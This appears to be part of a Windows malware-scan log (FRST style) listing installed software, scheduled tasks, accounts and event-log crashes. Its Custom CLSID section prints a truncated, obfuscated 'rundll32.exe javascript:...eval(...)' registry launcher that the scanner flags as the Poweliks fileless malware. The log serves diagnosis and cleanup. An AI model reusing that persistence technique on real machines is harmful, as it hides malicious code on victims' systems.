Binreader (HKLM-x32\...\{3D47B2C0-8748-4450-99AE-0746A5A74C8E}) (Version: 1.0.0 - Binreader)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden
calibre 64bit (HKLM\...\{0F072A3A-7D6F-4CE0-AB44-10DB3A7B3852}) (Version: 1.17.0 - Kovid Goyal)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Classic Shell (HKLM\...\{CB00799C-0E4F-4FD1-A046-BD24321BCDFF}) (Version: 3.6.5 - IvoSoft)
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) (Version: 2.0.1.3119 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.1925 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Free Alarm Clock 2.7.1 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 2.7 - Comfort Software Group)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.71 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - )
Hard Disk Scrubber 3.4 (Remove Only) (HKLM-x32\...\{DE47ADD1-B82B-4B52-AF29-76AE7EF4E19D}_is1) (Version: - Summit Computer Networks, Inc.)
HDR Efex Pro 2 (HKLM-x32\...\HDR Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.)
Hewlett-Packard ACLM.NET v1.2.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP 3D DriveGuard (HKLM\...\{F244D07D-1876-4CDD-914D-214E15A8D327}) (Version: 4.2.5.1 - Hewlett-Packard Company)
HP Connected Backup (HKLM-x32\...\{6BA5F6E7-6CC1-4117-816D-A549A06CE44E}) (Version: 8.7.0.0 - Autonomy)
HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: v1.0 - Meridian Audio Ltd)
HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{0EF47DBD-7E67-492F-9423-DAF028BEF627}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)
HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{609B11CC-8CED-4116-AD8A-A72168894D39}) (Version: 3.0.4 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\{34C821CA-6B55-44A0-8A9B-2EF471D6019E}) (Version: 6.0.100.244 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{B8019B54-F9BE-490A-9619-6D06F18F129F}) (Version: 7.0.32.44 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.5.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6417.0 - IDT)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2817 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.22 - mIRC Co. Ltd.)
Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! 
(x32 Version: 2.2.0.98 - WildTangent) Hidden Perfect Resize 7.0.1 Professional Edition (HKLM-x32\...\{FCADA4FF-142C-42A8-B73C-0A54A7F83345}) (Version: 7.0.1 - onOne Software) Photomatix Pro version 4.2.4 (HKLM\...\PhotomatixPro42x64_is1) (Version: 4.2.4 - HDRsoft Sarl) Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden Privacy Eraser (HKLM\...\{CB5AC03C-B8AD-980F-998E-51969A6DFC9F}_is1) (Version: 2.8.0.639 - Cybertron Software Co., Ltd.) Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek) Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.27025 - Realtek Semiconductor Corp.) Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden Silver Efex Pro 2 (HKLM-x32\...\Silver Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.) Skype™ 6.16 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.12 - Synaptics Incorporated) Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden Tixati (HKLM-x32\...\tixati) (Version: - ) TreeSize Free V2.7 (HKLM-x32\...\TreeSize Free_is1) (Version: 2.7 - JAM Software) Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.) 
VC 9.0 Runtime (x32 Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Welcome App (Start-up experience) (x32 Version: 12.0.14000 - Nero AG) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
WinRAR 4.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
Youtube Downloader HD v. 2.9.9.16.2 (HKLM-x32\...\Youtube Downloader HD_is1) (Version: - YoutubeDownloaderHD.com)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

29-11-2014 19:44:30 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2012-07-25 22:26 - 2012-07-25 22:26 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {44887619-6412-414B-896F-45E47A0080D8} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {5EBFA391-93A2-42F0-8C59-966AFE87038F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.)
Task: {5ED0D22D-A9B4-4852-A748-30F6CA9CC9C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-10] (Hewlett-Packard Company)
Task: {727E8D00-4042-4C2E-9218-079ECF9F7AE1} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2012-08-24] (Synaptics Incorporated)
Task: {72E3FF20-73DF-437C-BF3D-0A8F3877FD7A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.)
Task: {8F075D28-AFF0-4171-AED6-C76737CC070C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-08-07] (Hewlett-Packard Company)
Task: {B3D38C21-AAA2-49A7-956D-33969C76338A} - System32\Tasks\Cybertron\Privacy Eraser\SkipUAC => C:\Program Files\Cybertron\Privacy Eraser\PrivacyEraser.exe [2014-06-16] (Cybertron Software, Co., Ltd.)
Task: {DAFF4139-76A3-4C78-8758-708F3D7C2C2D} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2013-01-25 11:54 - 2011-03-02 10:40 - 00164864 _____ () C:\Program Files\WinRAR\rarext.dll
2012-09-06 02:47 - 2012-09-06 02:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe
2012-08-10 02:36 - 2012-08-10 02:36 - 04073320 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
2012-07-28 08:31 - 2012-07-28 08:31 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-11-21 00:32 - 2012-06-07 20:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 12:34 - 2012-06-08 12:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2012-11-21 00:15 - 2012-06-25 11:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Windows:nlsPreferences

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "SwitchBoard" HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\StartupApproved\Run: => "FreeAC" ========================= Accounts: ========================== Administrator (S-1-5-21-2762839642-1568754923-376086736-500 - Administrator - Disabled) Guest (S-1-5-21-2762839642-1568754923-376086736-501 - Limited - Disabled) johnsmith (S-1-5-21-2762839642-1568754923-376086736-1001 - Administrator - Enabled) => C:\Users\johnsmith ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (11/30/2014 09:07:26 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5094a012 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x9e8 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 09:05:22 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a5b9 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x1c54 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 08:35:11 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe, 
version: 1.2.3.4, time stamp: 0x2a425e19 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x0002076b Faulting process id: 0xafc Faulting application start time: 0x{d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe0 Faulting application path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe1 Faulting module path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe2 Report Id: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe3 Faulting package full name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe4 Faulting package-relative application ID: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe5 Error: (11/30/2014 08:09:43 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x50109de9 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x1564 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 08:09:35 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x0002fb1e Faulting process id: 0x510 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 07:49:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time 
stamp: 0x50109cce Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x034731a0 Faulting process id: 0xd70 Faulting application start time: 0xpowershell.exe0 Faulting application path: powershell.exe1 Faulting module path: powershell.exe2 Report Id: powershell.exe3 Faulting package full name: powershell.exe4 Faulting package-relative application ID: powershell.exe5 Error: (11/30/2014 07:49:02 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Application: powershell.exe Framework Version: v4.0.30319 Description: The process was terminated due to an unhandled exception. Exception Info: System.AccessViolationException Stack: at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32) at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32) at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, 
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon) at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2() at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action) at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, 
System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[]) at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord() at System.Management.Automation.Cmdlet.DoProcessRecord() at System.Management.Automation.CommandProcessor.ProcessRecord() at System.Management.Automation.CommandProcessorBase.DoExecute() at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean) at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean) at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext) at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at 
System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon) at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2() at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action) at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[]) at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[]) at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord() at System.Management.Automation.Cmdlet.DoProcessRecord() at System.Management.Automation.CommandProcessor.ProcessRecord() at System.Management.Automation.CommandProcessorBase.DoExecute() at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean) at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean) at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], 
System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext) at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame) at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon) at 